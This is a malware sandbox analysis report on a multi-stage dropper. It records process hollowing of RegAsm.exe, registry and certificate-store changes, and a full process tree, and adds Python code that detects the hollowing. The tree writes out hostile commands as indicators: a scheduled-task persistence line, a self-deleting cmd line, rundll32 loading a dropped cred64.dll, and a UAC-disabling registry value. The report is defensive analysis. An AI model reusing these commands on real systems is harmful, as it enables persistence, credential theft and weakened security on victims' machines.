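Three signatures above tell one story when read together: SetThreadContext calls from swiiiii.exe, alexxxxxxxx.exe and gold.exe into freshly started RegAsm.exe processes (the classic hollowing pattern: start a signed .NET utility suspended, overwrite its image, set the thread context, resume), WerFault.exe then reporting crashes for exactly those three injectors while the RegAsm.exe children keep running, and rundll32.exe making outbound connections on its own. The following is an added example, not part of the Triage report, that correlates those three observations over Sysmon-style ProcessCreate (EventID 1) and NetworkConnect (EventID 3) records. The pids and file names come from the report; the full paths, the WerFault command line, the parent of swiiiii.exe, the destination IP (the amadey C2 from the config above) and RegSvcs.exe as a third injection host are assumptions made for the example.

```python
import ipaddress
import re

# RegAsm.exe and jsc.exe are the SetThreadContext targets in this report;
# RegSvcs.exe is added on the assumption that the same signed .NET utilities get
# used interchangeably.
INJECTION_HOSTS = {"regasm.exe", "jsc.exe", "regsvcs.exe"}
USER_WRITABLE = ("\\appdata\\", "\\temp\\", "\\users\\public\\", "\\programdata\\")
_WERFAULT_PID = re.compile(r"\s-p\s+(\d+)")

# Constructed Sysmon-style events (EventID 1 = ProcessCreate, 3 = NetworkConnect).
EVENTS = [
    {"EventID": 1, "ProcessId": 3496, "ParentProcessId": 1628,
     "Image": "C:\\Users\\Admin\\AppData\\Local\\Temp\\swiiiii.exe",
     "ParentImage": "C:\\Users\\Admin\\AppData\\Local\\Temp\\4d0ab15804\\chrosha.exe"},
    {"EventID": 1, "ProcessId": 916, "ParentProcessId": 3496,
     "Image": "C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\RegAsm.exe",
     "ParentImage": "C:\\Users\\Admin\\AppData\\Local\\Temp\\swiiiii.exe"},
    # the injector crashes after it has done its job; WerFault names it via -p <pid>
    {"EventID": 1, "ProcessId": 4480, "ParentProcessId": 3496,
     "Image": "C:\\Windows\\SysWOW64\\WerFault.exe",
     "ParentImage": "C:\\Users\\Admin\\AppData\\Local\\Temp\\swiiiii.exe",
     "CommandLine": "C:\\Windows\\SysWOW64\\WerFault.exe -u -p 3496 -s 1196"},
    # benign control: a build started RegAsm.exe from Program Files
    {"EventID": 1, "ProcessId": 5120, "ParentProcessId": 5100,
     "Image": "C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\RegAsm.exe",
     "ParentImage": "C:\\Program Files\\Microsoft Visual Studio\\2022\\Community\\MSBuild\\Current\\Bin\\MSBuild.exe"},
    {"EventID": 3, "ProcessId": 3984, "Image": "C:\\Windows\\System32\\rundll32.exe",
     "DestinationIp": "193.233.132.167", "DestinationPort": 80},
    # benign control: rundll32 talking to an internal file server
    {"EventID": 3, "ProcessId": 4100, "Image": "C:\\Windows\\System32\\rundll32.exe",
     "DestinationIp": "10.0.0.5", "DestinationPort": 445},
]


def _base(path):
    return path.rsplit("\\", 1)[-1].lower()


def _user_writable(path):
    return any(marker in path.lower() for marker in USER_WRITABLE)


def hollowing_candidates(events):
    """A signed .NET utility started by an executable living in a user-writable folder."""
    return [{"host_pid": e["ProcessId"], "host": _base(e["Image"]),
             "injector_pid": e["ParentProcessId"], "injector": _base(e["ParentImage"])}
            for e in events
            if e["EventID"] == 1 and _base(e["Image"]) in INJECTION_HOSTS
            and _user_writable(e["ParentImage"])]


def crashed_injectors(events):
    """Candidates whose injector later crashed (WerFault -p <pid>) while the host
    process itself never did: the payload outlived the thing that started it."""
    crashed = set()
    for e in events:
        if e["EventID"] == 1 and _base(e["Image"]) == "werfault.exe":
            m = _WERFAULT_PID.search(e.get("CommandLine", ""))
            if m:
                crashed.add(int(m.group(1)))
    return [c for c in hollowing_candidates(events)
            if c["injector_pid"] in crashed and c["host_pid"] not in crashed]


def rundll32_external_connections(events):
    """rundll32.exe reaching a globally routable address on its own."""
    return [(e["ProcessId"], e["DestinationIp"], e["DestinationPort"])
            for e in events
            if e["EventID"] == 3 and _base(e["Image"]) == "rundll32.exe"
            and ipaddress.ip_address(e["DestinationIp"]).is_global]


if __name__ == "__main__":
    for c in hollowing_candidates(EVENTS):
        print("injection host:", c)
    for c in crashed_injectors(EVENTS):
        print("injector crashed, host survived:", c["injector"], "->", c["host"], c["host_pid"])
    for pid, ip, port in rundll32_external_connections(EVENTS):
        print(f"rundll32 pid {pid} -> {ip}:{port}")
```

The crash correlation is the cheap confirmation: a legitimate RegAsm.exe run has a living parent, whereas a hollowed one is typically orphaned within seconds.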
Checks processor information in registry (2 TTPs, 2 IoCs)
Processor information is often read in order to detect sandboxing environments.
Processes:
  description | ioc | process
  Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 | RegAsm.exe
  Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | RegAsm.exe
Creates scheduled task(s) (1 TTP, 12 IoCs)
Schtasks is often used by malware for persistence or to perform post-infection execution.
Processes:
  pid | process
  2176 | schtasks.exe
  2120 | schtasks.exe
  3356 | schtasks.exe
  1980 | schtasks.exe
  3824 | schtasks.exe
  560 | schtasks.exe
  880 | schtasks.exe
  1196 | schtasks.exe
  4404 | schtasks.exe
  4020 | schtasks.exe
  72 | schtasks.exe
  2696 | schtasks.exe
Enumerates system info in registry (2 TTPs, 4 IoCs)
Processes:
  description | ioc | process
  Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS | Install.exe
  Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName | Install.exe
  Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS | rundll32.exe
  Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName | rundll32.exe
Modifies data under HKEY_USERS (64 IoCs)
Processes:
  description | ioc | process
  Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs | powershell.exe
  Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates | powershell.exe
  Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root | powershell.exe
  Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs | powershell.exe
  Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs | powershell.exe
  Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs | powershell.exe
  Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust | powershell.exe
  Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root | powershell.exe
  Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust | powershell.exe
  Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs | powershell.exe
  Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs | powershell.exe
  Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust | powershell.exe
  Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates | powershell.exe
  Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs | powershell.exe
  Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates | powershell.exe
  Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates | powershell.exe
  Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root | powershell.exe
  Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs | powershell.exe
  Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates | powershell.exe
  Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs | powershell.exe
  Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root | powershell.exe
  Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates | powershell.exe
  Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs | powershell.exe
  Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing | powershell.exe
  Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates | powershell.exe
  Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates | powershell.exe
  Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs | powershell.exe
  Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Content\CachePrefix | ZilJVJq.exe
  Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1" | Install.exe
  Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs | powershell.exe
  Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust | powershell.exe
  Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs | powershell.exe
  Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates | powershell.exe
  Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople | powershell.exe
  Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1" | Install.exe
  Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed | powershell.exe
  Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates | powershell.exe
  Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs | powershell.exe
  Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates | powershell.exe
  Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates | powershell.exe
  Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA | powershell.exe
  Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates | powershell.exe
  Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates | powershell.exe
  Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates | powershell.exe
  Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs | powershell.exe
  Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs | powershell.exe
  Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates | powershell.exe
  Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs | powershell.exe
  Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates | powershell.exe
  Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" | powershell.exe
  Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" | ZilJVJq.exe
  Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs | powershell.exe
  Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs | powershell.exe
  Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA | powershell.exe
  Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople | powershell.exe
  Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates | powershell.exe
  Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs | powershell.exe
  Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates | powershell.exe
  Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates | powershell.exe
  Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs | powershell.exe
  Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust | powershell.exe
  Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs | powershell.exe
  Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs | powershell.exe
  Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs | powershell.exe
(signature title not captured)
Processes:
  description | ioc | process
  Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\F1A578C4CB5DE79A370893983FD4DA8B67B2B064 | keks.exe
  Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\F1A578C4CB5DE79A370893983FD4DA8B67B2B064\Blob = (certificate blob omitted) | keks.exe
  Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DDFB16CD4931C973A2037D3FC83A4D7D775D05E4 | YtVJ0C8eA764GvOCeDcLOEZg.exe
  Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DDFB16CD4931C973A2037D3FC83A4D7D775D05E4\Blob = (certificate blob omitted) | YtVJ0C8eA764GvOCeDcLOEZg.exe
  Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DDFB16CD4931C973A2037D3FC83A4D7D775D05E4\Blob = (certificate blob omitted) | YtVJ0C8eA764GvOCeDcLOEZg.exe
Suspicious behavior: AddClipboardFormatListener (1 IoC)
Processes:
  pid | process
  2684 | mstc.exe
Suspicious behavior: EnumeratesProcesses (64 IoCs)
Processes:
  pid | process | occurrences
  4452 | 7744c183f3dbcfa2c78274c26293f65039eea5535832ca47e740e0f60e42d9f0.exe | 2
  1628 | chrosha.exe | 2
  4664 | trf.exe | 1
  3984 | rundll32.exe | 10
  1332 | powershell.exe | 2
  3932 | keks.exe | 6
  3024 | jok.exe | 5
  2424 | powershell.exe | 3
  4516 | powershell.exe | 3
  3540 | powershell.exe | 3
  4584 | powershell.exe | 2
  3800 | powershell.exe | 2
  2684 | mstc.exe | 2
  2316 | lie.exe | 2
  3192 | powershell.exe | 3
  2164 | powershell.exe | 3
  1152 | powershell.exe | 3
  3684 | powershell.exe | 3
  4820 | powershell.exe | 3
  4224 | powershell.EXE | 3
  3840 | RegAsm.exe | 1
Suspicious use of AdjustPrivilegeToken 64 IoCs
Processes:
trf.exe, powershell.exe (×9), file300un.exe, keks.exe, mstc.exe, jok.exe, jsc.exe, RegAsm.exe, WMIC.exe
description | pid | process
Token: SeDebugPrivilege | 4664 | trf.exe
Token: SeBackupPrivilege | 4664 | trf.exe
Token: SeSecurityPrivilege (×4) | 4664 | trf.exe
Token: SeDebugPrivilege | 1332 | powershell.exe
Token: SeDebugPrivilege | 2756 | file300un.exe
Token: SeDebugPrivilege | 3932 | keks.exe
Token: SeDebugPrivilege | 2684 | mstc.exe
Token: SeDebugPrivilege | 3024 | jok.exe
Token: SeDebugPrivilege | 4748 | jsc.exe
Token: SeDebugPrivilege | 4984 | RegAsm.exe
Token: SeDebugPrivilege | 2424 | powershell.exe
Token: SeDebugPrivilege | 4516 | powershell.exe
Token: SeDebugPrivilege | 3540 | powershell.exe
Token: SeDebugPrivilege | 4584 | powershell.exe
Token: SeDebugPrivilege | 3800 | powershell.exe
Token: SeDebugPrivilege | 2684 | mstc.exe
Token: SeDebugPrivilege | 3192 | powershell.exe
Token: SeDebugPrivilege | 2164 | powershell.exe
Token: 21 privileges enabled, the full set twice (SeIncreaseQuotaPrivilege, SeSecurityPrivilege, SeTakeOwnershipPrivilege, SeLoadDriverPrivilege, SeSystemProfilePrivilege, SeSystemtimePrivilege, SeProfSingleProcessPrivilege, SeIncBasePriorityPrivilege, SeCreatePagefilePrivilege, SeBackupPrivilege, SeRestorePrivilege, SeShutdownPrivilege, SeDebugPrivilege, SeSystemEnvironmentPrivilege, SeRemoteShutdownPrivilege, SeUndockPrivilege, SeManageVolumePrivilege, and the unnamed privilege values 33, 34, 35, 36) | 2216 | WMIC.exe
Token: SeDebugPrivilege | 1152 | powershell.exe
The WMIC.exe row reflects the tool rather than the payload: WMIC enables every privilege in its token by default (its /PRIVILEGES global switch defaults to ENABLE). The SeDebugPrivilege entries for the dropped executables, RegAsm.exe and jsc.exe are the ones that matter, since that privilege is what lets them open and write other processes.
-
Suspicious use of SetWindowsHookEx 1 IoCs
Processes:
mstc.exe
pid | process
2684 | mstc.exe
SetWindowsHookEx installs a Windows message hook; combined with the clipboard listener above, this is the typical footprint of keystroke and clipboard capture.
-
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
chrosha.exe, swiiiii.exe, alexxxxxxxx.exe, gold.exe, RegAsm.exe, NewB.exe
source pid | source process | target pid | target process | write events
1628 | chrosha.exe | 3496 | swiiiii.exe | 3
3496 | swiiiii.exe | 3124 | RegAsm.exe | 3
3496 | swiiiii.exe | 916 | RegAsm.exe | 9
1628 | chrosha.exe | 3068 | alexxxxxxxx.exe | 3
3068 | alexxxxxxxx.exe | 4844 | RegAsm.exe | 3
3068 | alexxxxxxxx.exe | 4508 | RegAsm.exe | 3
3068 | alexxxxxxxx.exe | 3132 | RegAsm.exe | 3
3068 | alexxxxxxxx.exe | 920 | RegAsm.exe | 3
3068 | alexxxxxxxx.exe | 4984 | RegAsm.exe | 8
1628 | chrosha.exe | 2132 | gold.exe | 3
2132 | gold.exe | 4696 | RegAsm.exe | 9
4984 | RegAsm.exe | 3932 | keks.exe | 3
4984 | RegAsm.exe | 4664 | trf.exe | 2
1628 | chrosha.exe | 4596 | NewB.exe | 3
4596 | NewB.exe | 3824 | schtasks.exe | 3
1628 | chrosha.exe | 3024 | jok.exe | 3
Each dropped loader (swiiiii.exe, alexxxxxxxx.exe, gold.exe) starts RegAsm.exe with an empty command line, uses SetThreadContext and writes into it repeatedly, which is consistent with process hollowing of the signed .NET Framework utility. The RegAsm.exe instance 4984 is the one that came alive: it goes on to write into and launch keks.exe and trf.exe.
-
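The "wrote to memory" rows above describe the sample's injection graph, but the sandbox renders them flattened onto one line. The following Python is an added example (not part of the sandbox report) that parses rows in exactly that flattened form, counts repeated writes per source/target pair, traces any injected process back to the root injector, and flags hollowing hosts. HOST_IMAGES is an assumption for the example: the signed .NET Framework utilities that appear with empty command lines under dropped parents in the process tree (RegAsm.exe, CasPol.exe, jsc.exe). The embedded rows are copied from the table above with most repeats dropped.

```python
"""Parse a sandbox 'wrote to memory' table and reconstruct the injection chain.

Added example for this report, not part of the sandbox output. RAW holds rows
copied from the "Suspicious use of WriteProcessMemory" table, in the same
flattened form, with most repeats dropped. HOST_IMAGES is an assumption: the
signed .NET Framework utilities that appear with empty command lines under
dropped parents in the process tree (RegAsm.exe, CasPol.exe, jsc.exe).
"""
import re
from collections import Counter, defaultdict

RAW = (
    "PID 1628 wrote to memory of 3496 1628 chrosha.exe swiiiii.exe "
    "PID 3496 wrote to memory of 3124 3496 swiiiii.exe RegAsm.exe "
    "PID 3496 wrote to memory of 916 3496 swiiiii.exe RegAsm.exe "
    "PID 3496 wrote to memory of 916 3496 swiiiii.exe RegAsm.exe "
    "PID 1628 wrote to memory of 3068 1628 chrosha.exe alexxxxxxxx.exe "
    "PID 3068 wrote to memory of 4984 3068 alexxxxxxxx.exe RegAsm.exe "
    "PID 3068 wrote to memory of 4984 3068 alexxxxxxxx.exe RegAsm.exe "
    "PID 4984 wrote to memory of 3932 4984 RegAsm.exe keks.exe "
    "PID 4984 wrote to memory of 4664 4984 RegAsm.exe trf.exe "
    "PID 1628 wrote to memory of 4596 1628 chrosha.exe NewB.exe "
    "PID 4596 wrote to memory of 3824 4596 NewB.exe schtasks.exe"
)

# One row: "PID <src> wrote to memory of <dst> <src> <src image> <dst image>"
ROW = re.compile(r"PID (\d+) wrote to memory of (\d+) \1 (\S+) (\S+)")
HOST_IMAGES = {"regasm.exe", "caspol.exe", "jsc.exe"}  # assumption, see docstring


def parse_rows(text):
    """Return Counter{(src_pid, src_image, dst_pid, dst_image): write count}."""
    edges = Counter()
    for src, dst, src_img, dst_img in ROW.findall(text):
        edges[(int(src), src_img, int(dst), dst_img)] += 1
    return edges


def find_hollowing(edges):
    """Hosts are framework utilities written to by a non-framework parent.

    Returns {host_pid: {"parent": image, "writes": n, "writes_into": [images]}}.
    A host that itself goes on to write into other processes is running
    foreign code: here RegAsm.exe 4984 launches keks.exe and trf.exe.
    """
    hosts = {}
    writes_by_pid = defaultdict(list)
    for (src, src_img, dst, dst_img), n in edges.items():
        writes_by_pid[src].append(dst_img)
        if dst_img.lower() in HOST_IMAGES and src_img.lower() not in HOST_IMAGES:
            hosts[dst] = {"parent": src_img, "writes": n, "writes_into": []}
    for pid, info in hosts.items():
        info["writes_into"] = sorted(writes_by_pid.get(pid, []))
    return hosts


def lineage(edges, pid):
    """Trace pid back to the root injector, e.g. 'chrosha.exe > RegAsm.exe > keks.exe'."""
    parent = {dst: (src, src_img, dst_img) for (src, src_img, dst, dst_img) in edges}
    path, seen = [], set()
    while pid in parent and pid not in seen:
        seen.add(pid)
        src, src_img, dst_img = parent[pid]
        path.append(dst_img)
        if src not in parent:  # reached the root writer, which nobody wrote into
            path.append(src_img)
        pid = src
    return " > ".join(reversed(path))


if __name__ == "__main__":
    edges = parse_rows(RAW)
    for host, info in sorted(find_hollowing(edges).items()):
        print(f"hollowing host pid {host}: {info}")
    print(lineage(edges, 3932))
```

Feeding the full table into parse_rows gives the per-pair counts shown in the reformatted rows above; the repeated writes into one RegAsm.exe instance followed by that instance writing into new children is the shape to look for when the sandbox does not label the technique itself.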
System policy modification 1 TTPs 1 IoCs
Processes:
file300un.exe
description | ioc | process
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" | file300un.exe
EnableLUA = 0 turns User Account Control off for the whole machine; the change takes effect at the next reboot.
-
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
Processes
-
C:\Users\Admin\AppData\Local\Temp\7744c183f3dbcfa2c78274c26293f65039eea5535832ca47e740e0f60e42d9f0.exe"C:\Users\Admin\AppData\Local\Temp\7744c183f3dbcfa2c78274c26293f65039eea5535832ca47e740e0f60e42d9f0.exe"1⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Drops file in Windows directory
- Suspicious behavior: EnumeratesProcesses
PID:4452
-
C:\Users\Admin\AppData\Local\Temp\4d0ab15804\chrosha.exeC:\Users\Admin\AppData\Local\Temp\4d0ab15804\chrosha.exe1⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:1628 -
C:\Users\Admin\AppData\Local\Temp\1000147001\swiiiii.exe"C:\Users\Admin\AppData\Local\Temp\1000147001\swiiiii.exe"2⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
PID:3496 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"3⤵PID:3124
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"3⤵PID:916
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3496 -s 9003⤵
- Program crash
PID:4480 -
C:\Users\Admin\AppData\Local\Temp\1000148001\alexxxxxxxx.exe"C:\Users\Admin\AppData\Local\Temp\1000148001\alexxxxxxxx.exe"2⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
PID:3068 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"3⤵PID:4844
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"3⤵PID:4508
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"3⤵PID:3132
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"3⤵PID:920
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"3⤵
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4984 -
C:\Users\Admin\AppData\Roaming\configurationValue\keks.exe"C:\Users\Admin\AppData\Roaming\configurationValue\keks.exe"4⤵
- Executes dropped EXE
- Modifies system certificate store
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3932 -
C:\Users\Admin\AppData\Roaming\configurationValue\trf.exe"C:\Users\Admin\AppData\Roaming\configurationValue\trf.exe"4⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4664 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C choice /C Y /N /D Y /T 3 & Del "RegAsm.exe"4⤵PID:4448
-
C:\Windows\SysWOW64\choice.exechoice /C Y /N /D Y /T 35⤵PID:1264
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3068 -s 4203⤵
- Program crash
PID:1632 -
C:\Users\Admin\AppData\Local\Temp\1000149001\gold.exe"C:\Users\Admin\AppData\Local\Temp\1000149001\gold.exe"2⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
PID:2132 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"3⤵PID:4696
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2132 -s 3883⤵
- Program crash
PID:2368 -
C:\Users\Admin\AppData\Local\Temp\1000150001\NewB.exe"C:\Users\Admin\AppData\Local\Temp\1000150001\NewB.exe"2⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:4596 -
C:\Windows\SysWOW64\schtasks.exe"C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN NewB.exe /TR "C:\Users\Admin\AppData\Local\Temp\1000150001\NewB.exe" /F3⤵
- Creates scheduled task(s)
PID:3824 -
C:\Users\Admin\AppData\Local\Temp\1000228001\ISetup8.exe"C:\Users\Admin\AppData\Local\Temp\1000228001\ISetup8.exe"3⤵
- Executes dropped EXE
PID:4784 -
C:\Users\Admin\AppData\Local\Temp\1000229001\toolspub1.exe"C:\Users\Admin\AppData\Local\Temp\1000229001\toolspub1.exe"3⤵
- Executes dropped EXE
PID:4284 -
C:\Users\Admin\AppData\Local\Temp\1000230001\4767d2e713f2021e8fe856e3ea638b58.exe"C:\Users\Admin\AppData\Local\Temp\1000230001\4767d2e713f2021e8fe856e3ea638b58.exe"3⤵
- Executes dropped EXE
PID:3076 -
C:\Users\Admin\AppData\Local\Temp\1000152001\jok.exe"C:\Users\Admin\AppData\Local\Temp\1000152001\jok.exe"2⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3024 -
C:\Users\Admin\AppData\Local\Temp\1000153001\swiiii.exe"C:\Users\Admin\AppData\Local\Temp\1000153001\swiiii.exe"2⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:4268 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"3⤵PID:2400
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"3⤵
- Checks processor information in registry
- Suspicious behavior: EnumeratesProcesses
PID:3840 -
C:\Windows\SysWOW64\rundll32.exe"C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Roaming\c1ec479e5342a2\cred64.dll, Main2⤵
- Loads dropped DLL
PID:3396 -
